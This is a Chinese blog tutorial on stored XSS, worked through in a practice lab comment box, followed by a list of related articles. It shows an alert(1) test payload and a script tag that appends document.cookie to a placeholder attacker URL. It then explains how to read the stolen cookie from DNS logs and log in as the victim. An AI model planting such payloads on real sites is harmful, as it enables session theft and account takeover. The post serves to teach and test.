Web渗透测试之XSS攻击:存储型XSS

最新推荐文章于 2024-07-31 15:36:49 发布
最新推荐文章于 2024-07-31 15:36:49 发布
阅读量2k 收藏 6
点赞数
分类专栏: XSS 文章标签: 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vodkaDL/article/details/111464862
版权

文章目录

前言

  在了解了反射型XSS相关方面的内容之后,本篇我们将继续深入了解存储型XSS,笔者将通过具体的例子讲解存储型XSS攻击的具体流程与危害。

存储型XSS

  在之前的博客中我们提到过,存储型XSS是被包含在之后的HTTP请求响应中的,并且由于存储型XSS是伴随于留言评论等功能存在的,因此存储型XSS能够跟随留言内容一同被存入服务器,并且可以持续发挥作用。我们先来看一个简单的存储型XSS的例子。

最简单的存储型XSS

  我们先在靶场题目提供的评论栏中写入一个最简单的XSS:< script>alert(1)< /script>:
在评论栏中写入XSS
提交后再次访问该页面发现有弹窗且弹窗内容为1,表明我们写入的XSS已经随评论一起被存进服务器:
提交留言后再次访问该页面
接着查看网页源码:
查看网页源码
可以看到我们写入的XSS已经被嵌入到网页中,之后只要有用户浏览该网页就会触发我们写入的XSS。

利用存储型XSS获得cookie

  原理与上篇反射型XSS中用到的类似,都是借助DNSlog的方式来获得cookie。在评论框写入如下脚本:
< script src=“http://xxx/”+document.cookie>< /script>
  当该脚本成功嵌入网页源码中时就会触发浏览器执行该XSS,而我们只需查看DNS日志即可获得受害用户的cookie,接着抓包后将cookie替换为受害用户的cookie即可登录受害用户的账号。

总结

  与反射型XSS不同,由于存储型XSS可以随评论等一同存入服务器,因此可以被持续触发利用。而在获得cookie这块二者原理大致相当,都是将cookie拼接到受攻击者控制的域名中,然后通过查看DNS日志的方式获得cookie,最后修改请求包中的cookie达到冒充受害用户的目的。

VodkaDL
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
web安全渗透测试十大常规项(二):web渗透测试XSS跨站脚本攻击
HACKONE的博客
05-26 338
渗透测试XSS跨站脚本攻击XSS跨站脚本攻击 XSS跨站脚本攻击
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
热门推荐
m0_64378913的博客
05-13 2万+
目录1 XSS漏洞简介2 XSS漏洞危害3 XSS漏洞分类3.1 反射XSS3.2 存储XSS3.3 DOMXSS3.3.1 节点树模3.3.2 DOMXSS4 漏洞验证4.1 漏洞验证相关概念4.2 漏洞验证相关概念之间的区别4.3 常见POC5 XSS漏洞验证实例5.1 反射XSS漏洞验证实例5.2 存储XSS漏洞验证实例5.3 DOMXSS漏洞验证实例6 总结参考文章 1 XSS漏洞简介 定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是
存储xss案例
weixin_45694388的博客
08-15 1359
存储xss原理: 攻击者在页面插入xss代码,服务端将数据存入数据库,当用户访问存在xss漏洞的页面时,服务端从数据库取出数据展示到页面上,导致xss代码执行,达到攻击效果 案例: 在一个搭建的论坛网站中, 根据存储xss注入的条件,要找到可以存储到数据库的输入位置,并且这个位置还可以被其他用户查看, 例如在此网站中,我们可以尝试在发帖、评论区、标题、标签,以及个人主页的名称、签名、地址…等位置 帖子中: 发现只有点击xss才会显示弹窗,说明这不是一个存储xss,因为他只能影响到自己 发表后发
手摸手带你进行XSS攻击与防御
最新发布
公众号:该用户快成仙了
07-31 949
简单来说,通过设置CSP来控制浏览器加载页面时允许执行的资源来源,这样来减少XSS攻击
基于hadoop构建对象存储系统_对象存储添加Hadoop、OpenStack插件
weixin_39588252的博客
12-18 176
【IT168 资讯】对象存储初创公司Scality将其存储添加到Hadoop,使用户可避免通过Hadoop自己的文件系统加载数据。他们还推出了一款针对Cinder——在OpenStack项目里面的块存储层的插件。RING是基于一组X86服务器节点的对象存储基础架构,存储对象而不是文件或块,而且可以并行操作。Scality提供的一个被称为“生产级Hadoop存储实施”使用了CDMI——由SNIA开发...
XSS存储攻击
qq_42253044的博客
01-08 951
LOW 服务器端核心代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message inpu...
Web安全原理剖析(十五)——存储XSS攻击
Phantom03167的博客
10-26 1万+
存储XSS攻击
存储 XSS 攻击演示(附链接)
Flag少侠的博客
01-23 1498
存储 XSS 攻击演示(附链接)
Web渗透测试XSS攻击详解
weixin_65409651的博客
07-22 470
Web渗透测试Web Penetration Testing)是一种模拟黑客攻击的方法,用于评估Web应用程序的安全性。通过渗透测试,安全专家可以发现系统中的漏洞和弱点,并提供修复建议,以防止真正的黑客利用这些漏洞进行攻击。
web渗透—xss攻击防御
dongxie_tk的博客
11-10 1366
1、基于特征的防御 XSS漏洞和著名的SQL注入漏洞一样,都是利用了Web页面的编写不完善,所以每一个漏洞所利用和针对的弱点都不尽相同。这就给XSS漏洞防御带来了困难:不可能以单一特征来概括所有XSS攻击。 传统XSS防御多采用特征匹配方式,在所有提交的信息中都进行匹配检查。对于这种类XSS攻击,采用的模式匹配方法一般会需要对“javascript”这个关键字进行检索,一旦发现提交信息中包
Web应用安全:存储XSS.pptx
06-18
存储XSS,全称为存储跨站脚本攻击,是Web应用安全领域中的一种常见威胁。它与反射XSS的主要区别在于,存储XSS的恶意脚本不是通过URL参数传递,而是直接存储在服务器的数据库中,通常在用户交互式的内容区,...
Web应用安全:存储XSS习题(实验习题).docx
06-17
Web应用安全:存储XSS习题(实验习题).docx
奇安信安全扫描漏洞解决路径遍历和存储xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
Web安全测试(五):XSS攻击存储XSS漏洞
ml202187的博客
09-04 2236
结合内部资料,与安全渗透部门同事合力整理的安全测试相关资料教程,全方位涵盖电商、支付、金融、网络、数据库等领域的安全测试,覆盖Web、APP、中间件、内外网、Linux、Windows多个平台。学完后一定能成为安全大佬!《全栈安全测试教程(0基础)》存储XSS,持久化,代码是存储在服务器中的。
【网络攻防】“跨站脚本攻击” 第二弹 ——存储XSS
翼安研习社的博客
02-04 1624
撰稿|谢泳 编辑|王聪丽、虞珍妮 信息收集|谢泳 目录1. 前言2. 什么是存储XSS3. 攻击原理4. 防御方式 1. 前言 上一篇介绍了跨域脚本攻击中的“反射XSS”,列举和解释了恶意脚本注入的一些主要方式以及规避方法。事实上,除了直接注入JavaScript之外,还可以通过第三方比如flash、Java applet等进行攻击。 这些第三方工具有自己的运行环境,例如flash中使用ActionScript作为脚本,可以实现丰富灵活的功能,也为XSS提供了可乘之机,所以要避免加载用户自定义..
存储XSS的攻防:不想做开发的黑客不是好黑客
javagty6778的博客
03-11 407
我举个例子吧,当你想在HTML页面上显示一个小于号(
Web渗透测试存储XSS
julielele的博客
06-23 1451
存储XSS,插入">即可发生弹窗。
DVWA靶场存储XSS漏洞实验
weixin_44851588的博客
05-26 4825
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSSXSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值